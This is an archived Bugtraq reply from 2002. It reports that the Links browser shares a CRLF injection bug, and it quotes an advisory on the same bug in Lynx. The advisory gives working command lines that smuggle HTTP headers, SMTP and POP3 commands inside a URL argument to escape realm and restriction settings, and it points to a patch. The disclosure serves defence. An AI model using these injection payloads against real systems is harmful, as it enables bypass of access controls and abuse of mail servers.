Re: Lynx CRLF Injection, part two

From: Alberto Devesa (alberto.devesa@m-centric.com)
Date: 08/23/02


From: Alberto Devesa <alberto.devesa@m-centric.com>
To: Ulf Harnhammar <ulfh@update.uu.se>, bugtraq@securityfocus.com
Date: Fri, 23 Aug 2002 11:09:21 +0200

The same bug seems to affects to the links browser. I have tested it with the
0.96 version. Links is another console browser with extended capabilities not
supported by lynx like frames, colors and menus.

On Thursday 22 August 2002 19:32, Ulf Harnhammar wrote:
> Lynx CRLF Injection, part two
>
>
> This is a follow-up to my "Lynx CRLF Injection" post a few days
> ago.
>
>
> * Lynx has got a realm feature that restricts users from accessing
> any host apart from the host of its start page. That is, if you
> start Lynx with "lynx -realm http://www.site1.st/", you are not
> allowed to go to http://www.site2.st/ .
>
> The CRLF Injection security hole allows users to break out of
> realms - the command:
>
> $ lynx -realm "http://www.site1.st/ HTTP/1.0
> Host: www.site2.st
>
> "
>
> will show site2.st, despite the fact that it is outside of the realm.
>
>
> * It allows users to send arbitrary cookies, user agents and
> referers to a web server - even if you're using a restrictions option
> saying that you're not allowed to change user agent:
>
> $ lynx -restrictions=useragent "http://www.site1.st/ HTTP/1.0
> User-Agent: Ulf 0.0
> Referer: http://www.metaur.nu/
> Cookie: user=ulf
>
> "
>
>
> * It is also possible to use this hole for communication with other
> types of servers than HTTP servers. You can send e-mails with it, for
> example - even if you're using a restrictions option saying that
> you're not allowed to send e-mails:
>
> $ lynx -restrictions=mail "http://mail.site1.st:587/ HTTP/1.0
> HELO my.own.site
> MAIL FROM: <my.own@mail.address>
> RCPT TO: <info@site1.st>
> DATA
> From: my.own@mail.address
> To: info@site1.st
> Subject: This is..
>
> This is a URL that sends an e-mail (?).
> .
> QUIT
>
> "
>
> You have to use port 587, as Lynx blocks port 25.
>
> The MTA will complain about the "GET / HTTP/1.0" string, but it
> still works.
>
>
> * You can even use this hole for reading e-mails from a POP3 server:
>
> $ lynx "http://mail.site1.st:110/ HTTP/1.0
> USER ulf
> PASS xxxx
> LIST
> RETR 1
> QUIT
>
> "
>
> The POP3 server will also complain about the "GET / HTTP/1.0"
> string, but it still works with this technology as well.
>
>
> * As previously noted, the holes listed above mostly affects programs
> that start Lynx, interactively or not, with a URL wholly or partially
> under the user's control.
>
>
> * The patch for this hole has moved to:
> ftp://lynx.isc.org/lynx/lynx2.8.4/patches/lynx2.8.4rel.1c.patch
>
>
> // Ulf Harnhammar
> ulfh@update.uu.se